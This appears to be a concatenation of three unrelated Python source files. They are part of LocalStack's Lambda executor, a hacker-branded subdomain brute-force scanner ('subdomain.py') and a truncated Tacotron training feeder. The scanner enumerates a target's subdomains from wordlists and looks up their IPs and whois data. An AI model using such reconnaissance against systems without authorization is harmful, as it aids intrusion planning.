Given a function ARN, returns a valid docker container name.
:param func_arn: The ARN of the lambda function.
:return: A docker compatible name for the arn.
"""
return "localstack_lambda_" + re.sub(r"[^a-zA-Z0-9_.-]", "_", func_arn)
class LambdaExecutorSeparateContainers(LambdaExecutorContainers):
def __init__(self):
super(LambdaExecutorSeparateContainers, self).__init__()
self.max_port = LAMBDA_API_UNIQUE_PORTS
self.port_offset = LAMBDA_API_PORT_OFFSET
def prepare_event(self, environment: Dict, event_body: str) -> bytes:
# Tell Lambci to use STDIN for the event
environment["DOCKER_LAMBDA_USE_STDIN"] = "1"
return event_body.encode()
def execute_in_container(
self, func_details, env_vars, command, docker_flags=None, stdin=None, background=False
) -> Tuple[bytes, bytes]:
lambda_cwd = func_details.cwd
handler = func_details.handler
entrypoint = None
if command:
entrypoint = ""
elif handler:
command = handler
else:
command = None
# add Docker Lambda env vars
network = config.LAMBDA_DOCKER_NETWORK or None
if network == "host":
port = get_free_tcp_port()
env_vars["DOCKER_LAMBDA_API_PORT"] = port
env_vars["DOCKER_LAMBDA_RUNTIME_PORT"] = port
additional_flags = docker_flags or ""
dns = config.LAMBDA_DOCKER_DNS
docker_java_ports = PortMappings()
if Util.debug_java_port:
docker_java_ports.add(Util.debug_java_port)
docker_image = Util.docker_image_for_lambda(func_details)
if config.LAMBDA_REMOTE_DOCKER:
container_id = DOCKER_CLIENT.create_container(
image_name=docker_image,
interactive=True,
entrypoint=entrypoint,
remove=True,
network=network,
env_vars=env_vars,
dns=dns,
additional_flags=additional_flags,
ports=docker_java_ports,
command=command,
)
DOCKER_CLIENT.copy_into_container(container_id, f"{lambda_cwd}/.", DOCKER_TASK_FOLDER)
return DOCKER_CLIENT.start_container(
container_id, interactive=not background, attach=not background, stdin=stdin
)
else:
mount_volumes = None
if lambda_cwd:
mount_volumes = [
(Util.get_host_path_for_path_in_docker(lambda_cwd), DOCKER_TASK_FOLDER)
]
return DOCKER_CLIENT.run_container(
image_name=docker_image,
interactive=True,
detach=background,
entrypoint=entrypoint,
remove=True,
network=network,
env_vars=env_vars,
dns=dns,
additional_flags=additional_flags,
command=command,
mount_volumes=mount_volumes,
stdin=stdin,
)
class LambdaExecutorLocal(LambdaExecutor):
def _execute_in_custom_runtime(self, cmd: str, func_details=None) -> InvocationResult:
"""
Generic run function for executing lambdas in custom runtimes.
:param cmd: the command to execute
:param func_details: function details
:return: the InvocationResult
"""
env_vars = func_details and func_details.envvars
kwargs = {"stdin": True, "inherit_env": True, "asynchronous": True, "env_vars": env_vars}
process = run(cmd, stderr=subprocess.PIPE, outfile=subprocess.PIPE, **kwargs)
result, log_output = process.communicate()
try:
result = to_str(result).strip()
except Exception:
pass
log_output = to_str(log_output).strip()
return_code = process.returncode
# Note: The user's code may have been logging to stderr, in which case the logs
# will be part of the "result" variable here. Hence, make sure that we extract
# only the *last* line of "result" and consider anything above that as log output.
# TODO: not sure if this code is needed/used
if isinstance(result, str) and "\n" in result:
lines = result.split("\n")
idx = last_index_of(
lines, lambda line: line and not line.startswith(INTERNAL_LOG_PREFIX)
)
if idx >= 0:
result = lines[idx]
additional_logs = "\n".join(lines[:idx] + lines[idx + 1 :])
log_output += "\n%s" % additional_logs
log_formatted = log_output.strip().replace("\n", "\n> ")
func_arn = func_details and func_details.arn()
LOG.debug(
"Lambda %s result / log output:\n%s\n> %s" % (func_arn, result.strip(), log_formatted)
)
# store log output - TODO get live logs from `process` above?
_store_logs(func_details, log_output)
if return_code != 0:
raise InvocationException(
"Lambda process returned error status code: %s. Result: %s. Output:\n%s"
% (return_code, result, log_output),
log_output,
result,
)
invocation_result = InvocationResult(result, log_output=log_output)
return invocation_result
def _execute(
self, func_arn, func_details, event, context=None, version=None
) -> InvocationResult:
lambda_cwd = func_details.cwd
environment = self._prepare_environment(func_details)
if func_details.timeout:
environment["AWS_LAMBDA_FUNCTION_TIMEOUT"] = str(func_details.timeout)
if context:
environment["AWS_LAMBDA_FUNCTION_NAME"] = context.function_name
environment["AWS_LAMBDA_FUNCTION_VERSION"] = context.function_version
environment["AWS_LAMBDA_FUNCTION_INVOKED_ARN"] = context.invoked_function_arn
environment["AWS_LAMBDA_FUNCTION_MEMORY_SIZE"] = str(context.memory_limit_in_mb)
# execute the Lambda function in a forked sub-process, sync result via queue
queue = Queue()
lambda_function = func_details.function(version)
def do_execute():
# now we're executing in the child process, safe to change CWD and ENV
result = None
try:
if lambda_cwd:
os.chdir(lambda_cwd)
sys.path.insert(0, "")
if environment:
os.environ.update(environment)
# set default env variables required for most Lambda handlers
self.set_default_env_variables()
# run the actual handler function
result = lambda_function(event, context)
except Exception as e:
result = str(e)
sys.stderr.write("%s %s" % (e, traceback.format_exc()))
raise
finally:
queue.put(result)
process = Process(target=do_execute)
start_time = now(millis=True)
error = None
with CaptureOutput() as c:
try:
process.run()
except Exception as e:
error = e
result = queue.get()
end_time = now(millis=True)
# Make sure to keep the log line below, to ensure the log stream gets created
request_id = long_uid()
log_output = 'START %s: Lambda %s started via "local" executor ...' % (
request_id,
func_arn,
)
# TODO: Interweaving stdout/stderr currently not supported
for stream in (c.stdout(), c.stderr()):
if stream:
log_output += ("\n" if log_output else "") + stream
log_output += "\nEND RequestId: %s" % request_id
log_output += "\nREPORT RequestId: %s Duration: %s ms" % (
request_id,
int((end_time - start_time) * 1000),
)
# store logs to CloudWatch
_store_logs(func_details, log_output)
result = result.result if isinstance(result, InvocationResult) else result
if error:
LOG.info(
'Error executing Lambda "%s": %s %s'
% (func_arn, error, "".join(traceback.format_tb(error.__traceback__)))
)
raise InvocationException(result, log_output)
invocation_result = InvocationResult(result, log_output=log_output)
return invocation_result
def provide_file_to_lambda(self, local_file: str, inv_context: InvocationContext) -> str:
# This is a no-op for local executors - simply return the given local file path
return local_file
def execute_java_lambda(self, event, context, main_file, func_details=None):
func_details.envvars = func_details.envvars or {}
java_opts = config.LAMBDA_JAVA_OPTS or ""
handler = func_details.handler
func_details.envvars[LAMBDA_HANDLER_ENV_VAR_NAME] = handler
event_file = EVENT_FILE_PATTERN.replace("*", short_uid())
save_file(event_file, json.dumps(json_safe(event)))
TMP_FILES.append(event_file)
classpath = "%s:%s:%s" % (
main_file,
Util.get_java_classpath(main_file),
LAMBDA_EXECUTOR_JAR,
)
cmd = "java %s -cp %s %s %s" % (
java_opts,
classpath,
LAMBDA_EXECUTOR_CLASS,
event_file,
)
# apply plugin patches
inv_context = InvocationContext(
func_details, event, environment=func_details.envvars, lambda_command=cmd
)
self.apply_plugin_patches(inv_context)
cmd = inv_context.lambda_command
LOG.info(cmd)
# execute Lambda and get invocation result
invocation_result = self._execute_in_custom_runtime(cmd, func_details=func_details)
# run plugins post-processing logic
invocation_result = self.process_result_via_plugins(inv_context, invocation_result)
return invocation_result
def execute_javascript_lambda(self, event, context, main_file, func_details=None):
handler = func_details.handler
function = handler.split(".")[-1]
event_json_string = "%s" % (json.dumps(json_safe(event)) if event else "{}")
context_json_string = "%s" % (json.dumps(context.__dict__) if context else "{}")
cmd = (
"node -e 'require(\"%s\").%s(%s,%s).then(r => process.stdout.write(JSON.stringify(r)))'"
% (
main_file,
function,
event_json_string,
context_json_string,
)
)
LOG.info(cmd)
result = self._execute_in_custom_runtime(cmd, func_details=func_details)
return result
@staticmethod
def set_default_env_variables():
# set default env variables required for most Lambda handlers
default_env_vars = {"AWS_DEFAULT_REGION": aws_stack.get_region()}
env_vars_before = {var: os.environ.get(var) for var in default_env_vars}
os.environ.update({k: v for k, v in default_env_vars.items() if not env_vars_before.get(k)})
return env_vars_before
@staticmethod
def reset_default_env_variables(env_vars_before):
for env_name, env_value in env_vars_before.items():
env_value_before = env_vars_before.get(env_name)
os.environ[env_name] = env_value_before or ""
if env_value_before is None:
os.environ.pop(env_name, None)
def execute_go_lambda(self, event, context, main_file, func_details=None):
if func_details:
func_details.envvars["AWS_LAMBDA_FUNCTION_HANDLER"] = main_file
func_details.envvars["AWS_LAMBDA_EVENT_BODY"] = json.dumps(json_safe(event))
else:
LOG.warning("Unable to get function details for local execution of Golang Lambda")
cmd = GO_LAMBDA_RUNTIME
LOG.info(cmd)
result = self._execute_in_custom_runtime(cmd, func_details=func_details)
return result
class Util:
debug_java_port = False
@classmethod
def get_java_opts(cls):
opts = config.LAMBDA_JAVA_OPTS or ""
# Replace _debug_port_ with a random free port
if "_debug_port_" in opts:
if not cls.debug_java_port:
cls.debug_java_port = get_free_tcp_port()
opts = opts.replace("_debug_port_", ("%s" % cls.debug_java_port))
else:
# Parse the debug port from opts
m = re.match(".*address=(.+:)?(\\d+).*", opts)
if m is not None:
cls.debug_java_port = m.groups()[1]
return opts
@classmethod
def get_host_path_for_path_in_docker(cls, path):
return re.sub(r"^%s/(.*)$" % config.TMP_FOLDER, r"%s/\1" % config.HOST_TMP_FOLDER, path)
@classmethod
def format_windows_path(cls, path):
temp = path.replace(":", "").replace("\\", "/")
if len(temp) >= 1 and temp[:1] != "/":
temp = "/" + temp
temp = "%s%s" % (config.WINDOWS_DOCKER_MOUNT_PREFIX, temp)
return temp
@classmethod
def docker_image_for_lambda(cls, func_details):
runtime = func_details.runtime or ""
if func_details.code.get("ImageUri"):
LOG.warning(
"ImageUri is set: Using Lambda container images is only supported in LocalStack Pro"
)
docker_tag = runtime
docker_image = config.LAMBDA_CONTAINER_REGISTRY
# TODO: remove prefix once execution issues are fixed with dotnetcore/python lambdas
# See https://github.com/lambci/docker-lambda/pull/218
lambdas_to_add_prefix = [
"dotnetcore2.0",
"dotnetcore2.1",
"python3.6",
"python3.7",
]
if docker_image == "lambci/lambda" and any(
img in docker_tag for img in lambdas_to_add_prefix
):
docker_tag = "20191117-%s" % docker_tag
if runtime == "nodejs14.x":
# TODO temporary fix until lambci image for nodejs14.x becomes available
docker_image = "localstack/lambda-js"
return "%s:%s" % (docker_image, docker_tag)
@classmethod
def get_java_classpath(cls, archive):
"""
Return the Java classpath, using the parent folder of the
given archive as the base folder.
The result contains any *.jar files in the base folder, as
well as any JAR files in the "lib/*" subfolder living
alongside the supplied java archive (.jar or .zip).
:param archive: an absolute path to a .jar or .zip Java archive
:return: the Java classpath, relative to the base dir of "archive"
"""
entries = ["."]
base_dir = os.path.dirname(archive)
for pattern in ["%s/*.jar", "%s/lib/*.jar", "%s/java/lib/*.jar", "%s/*.zip"]:
for entry in glob.glob(pattern % base_dir):
if os.path.realpath(archive) != os.path.realpath(entry):
entries.append(os.path.relpath(entry, base_dir))
# make sure to append the localstack-utils.jar at the end of the classpath
# https://github.com/localstack/localstack/issues/1160
entries.append(os.path.relpath(archive, base_dir))
entries.append("*.jar")
entries.append("java/lib/*.jar")
result = ":".join(entries)
return result
@staticmethod
def mountable_tmp_file():
f = os.path.join(config.TMP_FOLDER, short_uid())
TMP_FILES.append(f)
return f
@staticmethod
def inject_endpoints_into_env(env_vars: Dict[str, str]):
env_vars = env_vars or {}
main_endpoint = get_main_endpoint_from_container()
if not env_vars.get("LOCALSTACK_HOSTNAME"):
env_vars["LOCALSTACK_HOSTNAME"] = main_endpoint
if not env_vars.get("AWS_ENDPOINT_URL"):
# Note that $AWS_ENDPOINT_URL is currently not (yet) supported by AWS, but we
# can use it to ship patched Lambda runtimes that can interpret this config.
env_vars["AWS_ENDPOINT_URL"] = config.get_edge_url(
localstack_hostname=main_endpoint, protocol="http"
)
return env_vars
# --------------
# GLOBAL STATE
# --------------
EXECUTOR_LOCAL = LambdaExecutorLocal()
EXECUTOR_CONTAINERS_SEPARATE = LambdaExecutorSeparateContainers()
EXECUTOR_CONTAINERS_REUSE = LambdaExecutorReuseContainers()
DEFAULT_EXECUTOR = EXECUTOR_CONTAINERS_SEPARATE
# the keys of AVAILABLE_EXECUTORS map to the LAMBDA_EXECUTOR config variable
AVAILABLE_EXECUTORS = {
"local": EXECUTOR_LOCAL,
"docker": EXECUTOR_CONTAINERS_SEPARATE,
"docker-reuse": EXECUTOR_CONTAINERS_REUSE,
}
|
subdomain.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Script Created By:
Cr4sHCoD3
Copyrights:
Cr4sHCoD3 2018
Special Mentions:
PureHackers PH
Blood Security Hackers
"""
import os
import sys
import platform
import time
import datetime
import argparse
import socket
from threading import Thread
try:
import requests
from requests.exceptions import ConnectionError
except:
if platform.system() == 'Linux':
os.system('clear')
elif platform.system() == 'Windows':
os.system('cls')
elif platform.system() == 'Darwin':
os.system('clear')
else:
os.system('clear')
print ("""
o-o o o o-o
| | | o |
o-o o o O-o o-O o-o o-O-o oo o-o o-o o-o oo o-o o-o o-o o-o
| | | | | | | | | | | | | | | | | | | | | | | | | |-' |
o--o o--o o-o o-o o-o o o o o-o-| o o o--o o-o o-o-o o o o o-o o
Created By: Cr4sHCoD3 [ PureHackers | Blood Security Hackers ]
Github: https://github.com/cr4shcod3
""")
print ('[!] - Module (requests) not installed!')
sys.exit()
try:
import whois
except:
if platform.system() == 'Linux':
os.system('clear')
elif platform.system() == 'Windows':
os.system('cls')
elif platform.system() == 'Darwin':
os.system('clear')
else:
os.system('clear')
print ("""
o-o o o o-o
| | | o |
o-o o o O-o o-O o-o o-O-o oo o-o o-o o-o oo o-o o-o o-o o-o
| | | | | | | | | | | | | | | | | | | | | | | | | |-' |
o--o o--o o-o o-o o-o o o o o-o-| o o o--o o-o o-o-o o o o o-o o
Created By: Cr4sHCoD3 [ PureHackers | Blood Security Hackers ]
Github: https://github.com/cr4shcod3
""")
print ('[!] - Module (python-whois) not installed!\n[!] - Module (future) not installed!')
sys.exit()
# GLOBAL
urls = []
valid = []
rc_400 = []
rc_401 = []
rc_403 = []
rc_404 = []
rc_500 = []
rc_502 = []
rc_503 = []
rc_504 = []
invalid = []
month = datetime.date.today().strftime("%B")
if datetime.date.today().strftime("%w") == 1 or datetime.date.today().strftime("%w") == '1':
day = 'Monday'
elif datetime.date.today().strftime("%w") == 2 or datetime.date.today().strftime("%w") == '2':
day = 'Tuesay'
elif datetime.date.today().strftime("%w") == 3 or datetime.date.today().strftime("%w") == '3':
day = 'Wednesday'
elif datetime.date.today().strftime("%w") == 4 or datetime.date.today().strftime("%w") == '4':
day = 'Thursday'
elif datetime.date.today().strftime("%w") == 5 or datetime.date.today().strftime("%w") == '5':
day = 'Friday'
elif datetime.date.today().strftime("%w") == 6 or datetime.date.today().strftime("%w") == '6':
day = 'Saturday'
elif datetime.date.today().strftime("%w") == 7 or datetime.date.today().strftime("%w") == '0':
day = 'Sunday'
mday = datetime.date.today().strftime("%d")
year = datetime.date.today().strftime("%Y")
current_datetime = datetime.datetime.now()
current_time = current_datetime.strftime('%I:%M:%S')
def clear():
if platform.system() == 'Linux':
os.system('clear')
elif platform.system() == 'Windows':
os.system('cls')
elif platform.system() == 'Darwin':
os.system('clear')
else:
os.system('clear')
def banner():
print ("""
o-o o o o-o
| | | o |
o-o o o O-o o-O o-o o-O-o oo o-o o-o o-o oo o-o o-o o-o o-o
| | | | | | | | | | | | | | | | | | | | | | | | | |-' |
o--o o--o o-o o-o o-o o o o o-o-| o o o--o o-o o-o-o o o o o-o o
Created By: Cr4sHCoD3 [ PureHackers | Blood Security Hackers ]
Github: https://github.com/cr4shcod3
""")
def generate_urls():
for i in list:
n_hostname = i + '.' + hostname
n_url = 'http://' + n_hostname
urls.append(n_url)
def subdomain_scan(s_url):
try:
r = requests.get(s_url)
if r.status_code == 200:
valid.append(s_url)
elif r.status_code == 400:
rc_400.append(s_url)
elif r.status_code == 401:
rc_401.append(s_url)
elif r.status_code == 403:
rc_403.append(s_url)
elif r.status_code == 404:
rc_404.append(s_url)
elif r.status_code == 500:
rc_500.append(s_url)
elif r.status_code == 502:
rc_502.append(s_url)
elif r.status_code == 503:
rc_503.append(s_url)
elif r.status_code == 504:
rc_504.append(s_url)
else:
invalid.append(s_url)
except ConnectionError:
invalid.append(s_url)
pass
def create_output():
output_file.write('{0}: {1} {2}, {3} = {4}\n'.format(day, month, mday, year, current_time))
output_file.write('URL: {0}\n'.format(url))
output_file.write('Subdomains:\n')
ii = 1
for i in valid:
output_file.write(' ' + str(ii) + '. {0}\n'.format(i))
ii = ii + 1
output_file.write('Response Code:\n')
ii = 1
output_file.write(' 400:\n')
for i in rc_400:
output_file.write(' ' + str(ii) + '. {0}\n'.format(i))
ii = ii + 1
ii = 1
output_file.write(' 401:\n')
for i in rc_401:
output_file.write(' ' + str(ii) + '. {0}\n'.format(i))
ii = ii + 1
ii = 1
output_file.write(' 403:\n')
for i in rc_403:
output_file.write(' ' + str(ii) + '. {0}\n'.format(i))
ii = ii + 1
ii = 1
output_file.write(' 404:\n')
for i in rc_404:
output_file.write(' ' + str(ii) + '. {0}\n'.format(i))
ii = ii + 1
ii = 1
output_file.write(' 500:\n')
for i in rc_500:
output_file.write(' ' + str(ii) + '. {0}\n'.format(i))
ii = ii + 1
ii = 1
output_file.write(' 502:\n')
for i in rc_502:
output_file.write(' ' + str(ii) + '. {0}\n'.format(i))
ii = ii + 1
ii = 1
output_file.write(' 503:\n')
for i in rc_503:
output_file.write(' ' + str(ii) + '. {0}\n'.format(i))
ii = ii + 1
ii = 1
output_file.write(' 504:\n')
for i in rc_504:
output_file.write(' ' + str(ii) + '. {0}\n'.format(i))
ii = ii + 1
output_file.write('\n\n')
def main():
generate_urls()
print ("""
[ Configuration ]
URL = {0}
Wordlist = {1}
Subdomains = {2}
Output = {3}
""".format(url, l_file, len(list), output))
try:
for i in urls:
t = Thread(target=subdomain_scan, args=(i,))
t.start()
except EOFError:
print ('\n[+] - Exiting.')
sys.exit()
except KeyboardInterrupt:
print ('\n[+] - Exiting.')
sys.exit()
try:
t.join()
except EOFError:
print ('\n[+] - Exiting.')
sys.exit()
except KeyboardInterrupt:
print ('\n[+] - Exiting.')
sys.exit()
print ("[ Subdomain Scanner ]")
for i in valid:
hname = i.replace('http://', '')
try:
w = whois.whois(hname)
country = w.country
except Exception:
country = '?'
pass
ip = socket.gethostbyname(hname)
print ('[+] 200 - ' + i + ' ( ' + str(country) + ' - ' + ip + ') ')
for i in rc_400:
hname = i.replace('http://', '')
try:
w = whois.whois(hname)
country = w.country
except Exception:
country = '?'
pass
ip = socket.gethostbyname(hname)
print ('[#] 400 - ' + i + ' ( ' + str(country) + ' - ' + ip + ') ')
for i in rc_401:
hname = i.replace('http://', '')
try:
w = whois.whois(hname)
country = w.country
except Exception:
country = '?'
pass
ip = socket.gethostbyname(hname)
print ('[#] 401 - ' + i + ' ( ' + str(country) + ' - ' + ip + ') ')
for i in rc_403:
hname = i.replace('http://', '')
try:
w = whois.whois(hname)
country = w.country
except Exception:
country = '?'
pass
ip = socket.gethostbyname(hname)
print ('[#] 403 - ' + i + ' ( ' + str(country) + ' - ' + ip + ') ')
for i in rc_404:
hname = i.replace('http://', '')
try:
w = whois.whois(hname)
country = w.country
except Exception:
country = '?'
pass
ip = socket.gethostbyname(hname)
print ('[#] 404 - ' + i + ' ( ' + str(country) + ' - ' + ip + ') ')
for i in rc_500:
hname = i.replace('http://', '')
try:
w = whois.whois(hname)
country = w.country
except Exception:
country = '?'
pass
ip = socket.gethostbyname(hname)
print ('[#] 500 - ' + i + ' ( ' + str(country) + ' - ' + ip + ') ')
for i in rc_502:
hname = i.replace('http://', '')
try:
w = whois.whois(hname)
country = w.country
except Exception:
country = '?'
pass
ip = socket.gethostbyname(hname)
print ('[#] 502 - ' + i + ' ( ' + str(country) + ' - ' + ip + ') ')
for i in rc_503:
hname = i.replace('http://', '')
try:
w = whois.whois(hname)
country = w.country
except Exception:
country = '?'
pass
ip = socket.gethostbyname(hname)
print ('[#] 503 - ' + i + ' ( ' + str(country) + ' - ' + ip + ') ')
for i in rc_504:
hname = i.replace('http://', '')
try:
w = whois.whois(hname)
country = w.country
except Exception:
country = '?'
pass
ip = socket.gethostbyname(hname)
print ('[#] 504 - ' + i + ' ( ' + str(country) + ' - ' + ip + ') ')
print ("""
[ Result ]
Valid = {0}
Invalid = {1}
Response Codes:
400 = {2}
401 = {3}
403 = {4}
404 = {5}
500 = {6}
502 = {7}
503 = {8}
504 = {9}
""".format(len(valid), len(invalid), len(rc_400), len(rc_401), len(rc_403), len(rc_404), len(rc_500), len(rc_502), len(rc_503), len(rc_504)))
create_output()
if __name__ == '__main__':
clear()
banner()
parser = argparse.ArgumentParser(description='Python Subdomain Scanner Created By: Cr4sHCoD3')
parser.add_argument('-u',
'--url',
metavar='URL',
action='store',
help='"Set the target URL." [http://example.com]',
type=str)
parser.add_argument('-l',
'--list',
choices=['default', '100', '500', '1000', '10000', 'uk-500', 'uk-1000'],
default='default',
metavar='NUM',
action='store',
help='"Set the wordlist to be used." [100] / [500] / [1000] / [10000] / [uk-500] / [uk-1000] / [default]')
parser.add_argument('-cl',
'--custom-list',
metavar='FILE',
default='wordlist/s.txt',
action='store',
help='"Set the wordlist in your own custom wordlist." [Filename.txt]')
output = 'subdomains_output.txt'
parser.add_argument('-o',
'--output',
default=output,
metavar='FILE',
action='store',
help='"Set the output file." [output.txt]')
args = parser.parse_args()
if args.url is None:
url = raw_input('URL: ')
if 'www.' in url:
url = url.replace('www.', '')
hostname = url.replace('http://', '')
elif args.url is not None:
url = args.url
if 'www.' in url:
url = url.replace('www.', '')
hostname = url.replace('http://', '')
if args.list == 'default':
l_file = 'wordlist/s.txt'
list_file = open(l_file, 'r')
list = list_file.read().splitlines()
elif args.list == '100':
l_file = 'wordlist/s-100.txt'
list_file = open(l_file, 'r')
list = list_file.read().splitlines()
elif args.list == '500':
l_file = 'wordlist/s-500.txt'
list_file = open(l_file, 'r')
list = list_file.read().splitlines()
elif args.list == '1000':
l_file = 'wordlist/s-1000.txt'
list_file = open(l_file, 'r')
list = list_file.read().splitlines()
elif args.list == '10000':
l_file = 'wordlist/s-10000.txt'
list_file = open(l_file, 'r')
list = list_file.read().splitlines()
elif args.list == 'uk-500':
l_file = 'wordlist/suk-500.txt'
list_file = open(l_file, 'r')
list = list_file.read().splitlines()
elif args.list == 'uk-1000':
l_file = 'wordlist/suk-1000.txt'
list_file = open(l_file, 'r')
list = list_file.read().splitlines()
else:
l_file = 'wordlist/s.txt'
list_file = open('wordlist/s.txt', 'r')
list = list_file.read().splitlines()
if args.list == 'default' and args.custom_list is not None:
l_file = args.custom_list
list_file = open(args.custom_list, 'r')
list = list_file.read().splitlines()
if args.custom_list is None:
l_file = 'wordlist/s.txt'
list_file = open('wordlist/s.txt', 'r')
list = list_file.read().splitlines()
if args.output == output:
output_file = open(output, 'a+')
elif args.output != output:
if '.txt' not in args.output:
args.output = args.output + '.txt'
output_file = open(args.output, 'a+')
main()
|
feeder.py | from sklearn.model_selection import train_test_split
from synthesizer.utils.text import text_to_sequence
from synthesizer.infolog import log
import tensorflow as tf
import numpy as np
import threading
import time
import os
_batches_per_group = 64
class Feeder:
"""
Feeds batches of data into queue on a background thread.
"""
def __init__(self, coordinator, metadata_filename, hparams):
super(Feeder, self).__init__()
self._coord = coordinator
self._hparams = hparams
self._cleaner_names = [x.strip() for x in hparams.cleaners.split(",")]
self._train_offset = 0
self._test_offset = 0
# Load metadata
self._mel_dir = os.path.join(os.path.dirname(metadata_filename), "mels")
self._embed_dir = os.path.join(os.path.dirname(metadata_filename), "embeds")
with open(metadata_filename, encoding="utf-8") as f:
self._metadata = [line.strip().split("|") for line in f]
frame_shift_ms = hparams.hop_size / hparams.sample_rate
hours = sum([int(x[4]) for x in self._metadata]) * frame_shift_ms / (3600)
log("Loaded metadata for {} examples ({:.2f} hours)".format(len(self._metadata), hours))
# Train test split
if hparams.tacotron_test_size is None:
assert hparams.tacotron_test_batches is not None
test_size = (hparams.tacotron_test_size if hparams.tacotron_test_size is not None
else hparams.tacotron_test_batches * hparams.tacotron_batch_size)
indices = np.arange(len(self._metadata))
train_indices, test_indices = train_test_split(indices,
test_size=test_size,
random_state=hparams.tacotron_data_random_state)
# Make sure test_indices is a multiple of batch_size else round up
len_test_indices = self._round_down(len(test_indices), hparams.tacotron_batch_size)
extra_test = test_indices[len_test_indices:]
test_indices = test_indices[:len_test_indices]
train_indices = np.concatenate([train_indices, extra_test])
self._train_meta = list(np.array(self._metadata)[train_indices])
self._test_meta = list(np.array(self._metadata)[test_indices])
self.test_steps = len(self._test_meta) // hparams.tacotron_batch_size
if hparams.tacotron_test_size is None:
assert hparams.tacotron_test_batches == self.test_steps
# pad input sequences with the <pad_token> 0 ( _ )
self._pad = 0
# explicitely setting the padding to a value that doesn"t originally exist in the spectogram
# to avoid any possible conflicts, without affecting the output range of the model too much
if hparams.symmetric_mels:
self._target_pad = -hparams.max_abs_value
else:
self._target_pad = 0.
# Mark finished sequences with 1s
self._token_pad = 1.
with tf.device("/cpu:0"):
# Create placeholders for inputs and targets. Don"t specify batch size because we want
# to be able to feed different batch sizes at eval time.
self._placeholders = [
tf.placeholder(tf.int32, shape=(None, None), name="inputs"),
tf.placeholder(tf.int32, shape=(None,), name="input_lengths"),
tf.placeholder(tf.float32, shape=(None, None, hparams.num_mels),
name="mel_targets"),
tf.placeholder(tf.float32, shape=(None, None), name="token_targets"),
tf.placeholder(tf.int32, shape=(None,), name="targets_lengths"),
tf.placeholder(tf.int32, shape=(hparams.tacotron_num_gpus, None),
name="split_infos"),
# SV2TTS
tf.placeholder(tf.float32, shape=(None, hparams.speaker_embedding_size),
name="speaker_embeddings")
]
# Create queue for buffering data
queue = tf.FIFOQueue(8, [tf.int32, tf.int32, tf.float32, tf.float32,
tf.int32, tf.int32, tf.float32], name="input_queue")
self._enqueue_op = queue.enqueue(self._placeholders)
self.inputs, self.input_lengths, self.mel_targets, self.token_targets, \
self.targets_lengths, self.split_infos, self.speaker_embeddings = queue.dequeue()
self.inputs.set_shape(self._placeholders[0].shape)
self.input_lengths.set_shape(self._placeholders[1].shape)
self.mel_targets.set_shape(self._placeholders[2].shape)
self.token_targets.set_shape(self._placeholders[3].shape)
self.targets_lengths.set_shape(self._placeholders[4].shape)
self.split_infos.set_shape(self._placeholders[5].shape)
self.speaker_embeddings.set_shape(self._placeholders[6].shape)
# Create eval queue for buffering eval data
eval_queue = tf.FIFOQueue(1, [tf.int32, tf.int32, tf.float32, tf.float32,
tf.int32, tf.int32, tf.float32], name="eval_queue")
self._eval_enqueue_op = eval_queue.enqueue(self._placeholders)
self.eval_inputs, self.eval_input_lengths, self.eval_mel_targets, \
self.eval_token_targets, self.eval_targets_lengths, \
self.eval_split_infos, self.eval_speaker_embeddings = eval_queue.dequeue()
self.eval_inputs.set_shape(self._placeholders[0].shape)
self.eval_input_lengths.set_shape(self._placeholders[1].shape)
self.eval_mel_targets.set_shape(self._placeholders[2].shape)
self.eval_token_targets.set_shape(self._placeholders[3].shape)
self.eval_targets_lengths.set_shape(self._placeholders[4].shape)
self.eval_split_infos.set_shape(self._placeholders[5].shape)
self.eval_speaker_embeddings.set_shape(self._placeholders[6].shape)
def start_threads(self, session):
self._session = session
thread = threading.Thread(name="background", target=self._enqueue_next_train_group)
thread.daemon = True # Thread will close when parent quits
thread.start()
thread = threading.Thread(name="background", target=self._enqueue_next_test_group)
thread.daemon = True # Thread will close when parent quits
thread.start()
def _get_test_groups(self):
meta = self._test_meta[self._test_offset]
self._test_offset += 1
text = meta[5]
input_data = np.asarray(text_to_sequence(text, self._cleaner_names), dtype=np.int32)
mel_target = np.load(os.path.join(self._mel_dir, meta[1]))
# Create parallel sequences containing zeros to represent a non finished sequence
token_target = np.asarray([0.] * (len(mel_target) - 1))
embed_target = np.load(os.path.join(self._embed_dir, meta[2]))
return input_data, mel_target, token_target, embed_target, len(mel_target)
def make_test_batches(self):
start = time.time()
# Read a group of examples
n = self._hparams.tacotron_batch_size
r = self._hparams.outputs_per_step
# Test on entire test set
examples = [self._get_test_groups() for i in range(len(self._test_meta))]
# Bucket examples based on similar output sequence length for efficiency
examples.sort(key=lambda x: x[-1])
batches = [examples[i: i + n] for i in range(0, len(examples), n)]
np.random.shuffle(batches)
log("\nGenerated %d test batches of size %d in %.3f sec" % (len(batches), n, time.time() - start))
return batches, r
def _enqueue_next_train_group(self):
while not self._coord.should_stop():
start = time.time()
# Read a group of examples
n = self._hparams.tacotron_batch_size
r = self._hparams.outputs_per_step
examples = [self._get_next_example() for i in range(n * _batches_per_group)]
# Bucket examples based on similar output sequence length for efficiency
examples.sort(key=lambda x: x[-1])
batches = [examples[i: i + n] for i in range(0, len(examples), n)]
np.random.shuffle(batches)
log("\nGenerated {} train batches of size {} in {:.3f} sec".format(len(batches), n, time.time() - start))
for batch in batches:
feed_dict = dict(zip(self._placeholders, self._prepare_batch(batch, r)))
self._session.run(self._enqueue_op, feed_dict=feed_dict)
def _enqueue_next_test_group(self):
# Create test batches once and evaluate on them for all test steps
test_batches, r = self.make_test_batches()
while not self._coord.should_stop():
for batch in test_batches:
feed_dict = dict(zip(self._placeholders, self._prepare_batch(batch, r)))
self._session.run(self._eval_enqueue_op, feed_dict=feed_dict)
def _get_next_example(self):
"""Gets a single example (input, mel_target, token_target, linear_target, mel_length) from_ disk
"""
if self._train_offset >= len(self._train_meta):
self._train_offset = 0
np.random.shuffle(self._train_meta)
meta = self._train_meta[self._train_offset]
self._train_offset += 1
text = meta[5]
input_data = np.asarray(text_to_sequence(text, self._cleaner_names), dtype=np.int32)
mel_target = np.load(os.path.join(self._mel_dir, meta[1]))
# Create parallel sequences containing zeros to represent a non finished sequence
token_target = np.asarray([0.] * (len(mel_target) - 1))
embed_target = np.load(os.path.join(self._embed_dir, meta[2]))
return input_data, mel_target, token_target, embed_target, len(mel_target)
def _prepare_batch(self, batches, outputs_per_step):
assert 0 == len(batches) % self._hparams.tacotron_num_gpus
size_per_device = int(len(batches) / self._hparams.tacotron_num_gpus)
np.random.shuffle(batches)
inputs = None
mel_targets = None
token_targets = None
targets_lengths = None
split_infos = []
